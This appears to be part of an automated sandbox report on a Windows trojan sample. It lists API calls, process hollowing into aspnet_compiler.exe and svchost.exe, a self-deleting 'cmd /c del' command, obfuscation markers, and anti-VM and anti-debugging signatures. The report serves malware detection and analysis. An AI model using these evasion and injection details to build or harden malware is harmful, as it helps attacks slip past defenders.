Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559950 NtQueueApcThread, 2_2_01559950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015599D0 NtCreateProcessEx, 2_2_015599D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155B040 NtSuspendThread, 2_2_0155B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559820 NtEnumerateKey, 2_2_01559820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015598A0 NtWriteVirtualMemory, 2_2_015598A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559B00 NtSetValueKey, 2_2_01559B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155A3B0 NtGetContextThread, 2_2_0155A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A10 NtQuerySection, 2_2_01559A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A80 NtOpenDirectoryObject, 2_2_01559A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559560 NtWriteFile, 2_2_01559560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155AD30 NtSetContextThread, 2_2_0155AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559520 NtWaitForSingleObject, 2_2_01559520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015595F0 NtQueryInformationFile, 2_2_015595F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559770 NtSetInformationFile, 2_2_01559770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155A770 NtOpenThread, 2_2_0155A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559760 NtOpenProcess, 2_2_01559760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155A710 NtOpenProcessToken, 2_2_0155A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559730 NtQueryVirtualMemory, 2_2_01559730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559650 NtQueryValueKey, 2_2_01559650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559670 NtQueryInformationProcess, 2_2_01559670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559610 NtEnumerateValueKey, 2_2_01559610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015596D0 NtCreateKey, 2_2_015596D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A50 NtCreateFile,LdrInitializeThunk, 12_2_03969A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039699A0 NtCreateSection,LdrInitializeThunk, 12_2_039699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_03969910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969840 NtDelayExecution,LdrInitializeThunk, 12_2_03969840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969860 NtQuerySystemInformation,LdrInitializeThunk, 12_2_03969860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969780 NtMapViewOfSection,LdrInitializeThunk, 12_2_03969780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969FE0 NtCreateMutant,LdrInitializeThunk, 12_2_03969FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969710 NtQueryInformationToken,LdrInitializeThunk, 12_2_03969710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039696D0 NtCreateKey,LdrInitializeThunk, 12_2_039696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_039696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969650 NtQueryValueKey,LdrInitializeThunk, 12_2_03969650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_03969660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039695D0 NtClose,LdrInitializeThunk, 12_2_039695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969540 NtReadFile,LdrInitializeThunk, 12_2_03969540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396A3B0 NtGetContextThread, 12_2_0396A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969B00 NtSetValueKey, 12_2_03969B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A80 NtOpenDirectoryObject, 12_2_03969A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A10 NtQuerySection, 12_2_03969A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A00 NtProtectVirtualMemory, 12_2_03969A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A20 NtResumeThread, 12_2_03969A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039699D0 NtCreateProcessEx, 12_2_039699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969950 NtQueueApcThread, 12_2_03969950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039698A0 NtWriteVirtualMemory, 12_2_039698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039698F0 NtReadVirtualMemory, 12_2_039698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969820 NtEnumerateKey, 12_2_03969820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396B040 NtSuspendThread, 12_2_0396B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039697A0 NtUnmapViewOfSection, 12_2_039697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396A710 NtOpenProcessToken, 12_2_0396A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969730 NtQueryVirtualMemory, 12_2_03969730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396A770 NtOpenThread, 12_2_0396A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969770 NtSetInformationFile, 12_2_03969770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969760 NtOpenProcess, 12_2_03969760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969610 NtEnumerateValueKey, 12_2_03969610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969670 NtQueryInformationProcess, 12_2_03969670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039695F0 NtQueryInformationFile, 12_2_039695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396AD30 NtSetContextThread, 12_2_0396AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969520 NtWaitForSingleObject, 12_2_03969520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969560 NtWriteFile, 12_2_03969560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C785D0 NtCreateFile, 12_2_00C785D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78680 NtReadFile, 12_2_00C78680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C787B0 NtAllocateVirtualMemory, 12_2_00C787B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78700 NtClose, 12_2_00C78700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C785CA NtCreateFile, 12_2_00C785CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C786CB NtReadFile, 12_2_00C786CB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7867A NtReadFile, 12_2_00C7867A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C787AA NtAllocateVirtualMemory, 12_2_00C787AA
Sample file is different than original file name gathered from version info
Source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTHEDEVILISHERE.dll> vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.268183318.000000000082C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBMCXBMXCKSKS.exe: vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTHEDEVILISHERE.dll> vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.272166008.0000000003D8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.268464852.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs fooYgfbxno.exe
Source: fooYgfbxno.exe Binary or memory string: OriginalFilenameBMCXBMXCKSKS.exe: vs fooYgfbxno.exe
Source: fooYgfbxno.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fooYgfbxno.exe Virustotal: Detection: 31%
Source: fooYgfbxno.exe ReversingLabs: Detection: 43%
Source: fooYgfbxno.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fooYgfbxno.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\fooYgfbxno.exe "C:\Users\user\Desktop\fooYgfbxno.exe"
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fooYgfbxno.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/1@10/6
Source: C:\Users\user\Desktop\fooYgfbxno.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4804:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: fooYgfbxno.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: fooYgfbxno.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: fooYgfbxno.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: fooYgfbxno.exe
Source: Binary string: THEDEVILISHERE.pdb source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: fooYgfbxno.exe
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb source: svchost.exe, 0000000C.00000002.530634745.0000000003E37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B87C push eax; ret 2_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B812 push eax; ret 2_2_0041B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B81B push eax; ret 2_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0040D155 push ecx; ret 2_2_0040D156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418A7B push ss; ret 2_2_00418A7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00416232 push 00000005h; retf 2_2_00416234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041BCD2 push esp; ret 2_2_0041BE41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418CD8 push edx; ret 2_2_00418CD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00415588 push esi; retf 2_2_0041558A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00415F51 push CA8369B7h; retf 2_2_00415F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B7C5 push eax; ret 2_2_0041B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0156D0D1 push ecx; ret 2_2_0156D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0397D0D1 push ecx; ret 12_2_0397D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B87C push eax; ret 12_2_00C7B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B812 push eax; ret 12_2_00C7B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B81B push eax; ret 12_2_00C7B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C6D155 push ecx; ret 12_2_00C6D156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78A7B push ss; ret 12_2_00C78A7F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C76232 push 00000005h; retf 12_2_00C76234
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7BCD3 push esp; ret 12_2_00C7BE41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78CD8 push edx; ret 12_2_00C78CD9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C75588 push esi; retf 12_2_00C7558A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B7C5 push eax; ret 12_2_00C7B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C75F51 push CA8369B7h; retf 12_2_00C75F56
Source: initial sample Static PE information: section name: .text entropy: 7.92488075838
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000C68604 second address: 0000000000C6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000C6898E second address: 0000000000C68994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\fooYgfbxno.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5440 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\fooYgfbxno.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 5.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: explorer.exe, 00000003.00000000.303097159.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000003.00000000.271804441.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000003.00000000.291164109.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.335060863.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000003.00000000.271804441.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: explorer.exe, 00000003.00000000.311813363.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Enables debug privileges
